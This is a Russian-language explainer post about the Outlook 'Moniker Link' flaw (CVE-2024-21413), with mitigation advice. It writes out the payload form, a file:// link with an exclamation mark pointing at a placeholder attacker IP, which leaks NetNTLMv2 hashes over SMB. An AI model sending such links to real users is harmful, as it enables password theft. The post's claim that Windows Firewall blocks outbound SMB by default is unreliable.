🎯 Moniker Link: Опасная ссылка, которая ворует ваш пароль
Кратко Moniker Link (CVE-2024-21413) — это критическая уязвимость в Microsoft Outlook, которая позволяет злоумышленнику украсть ваш пароль или даже выполнить код на вашем компьютере без сложных действий . Всё, что нужно жертве, — кликнуть по ссылке в письме.
📀 Как это работает Outlook умеет обрабатывать специальные ссылки — Moniker Links. Обычно, когда вы кликаете по такой ссылке, Outlook включает защитный режим (Protected View), чтобы не дать вредоносному коду навредить системе. Но уязвимость позволяет обойти эту защиту. Хакер вставляет в письмо ссылку вида file://IP_АТАКУЮЩЕГО/test!exploit . Когда жертва кликает, Outlook пытается подключиться к серверу злоумышленника по протоколу SMB, и Windows автоматически отправляет хеш вашего пароля (NetNTLMv2) на этот сервер. Никаких дополнительных запросов или подтверждений — просто клик по ссылке . Ключевой элемент: восклицательный знак (!) в ссылке обманывает защитные механизмы Outlook и позволяет атаке сработать .
📀 Чем это грозит Украденный хеш пароля можно попытаться расшифровать с помощью специальных программ. Если пароль слабый (например, 1414 или qwerty), взлом займёт секунды . Дальше хакер может выдать себя за вас и получить доступ к корпоративной сети, почте и другим ресурсам компании. Технически уязвимость также может привести к выполнению вредоносного кода, хотя публичных примеров использования в этом векторе пока нет .
📀 Как защититься · Установите патч KB5002519 — Microsoft выпустила официальное исправление, и это главная защита . · Включите брандмауэр Windows — он блокирует исходящие SMB-подключения по умолчанию и может предотвратить утечку хеша, даже если ссылка не сработает . · Используйте YARA-правила — исследователи разработали специальные правила для обнаружения писем с Moniker Link до того, как они попадут к пользователям .
📀 Современное положение (2026) Хотя патч вышел, проблема не исчезла полностью. Сама уязвимость в Outlook закрыта, но протокол NTLM всё ещё опасен внутри корпоративных сетей: если хакер уже внутри, он может попытаться перехватить хеши через SMB-соединения . Поэтому эксперты рекомендуют не ограничиваться патчем и постепенно отключать NTLM в пользу Kerberos .
#monikerlink #outlook #cve202421413 #ntlm #кибербезопасность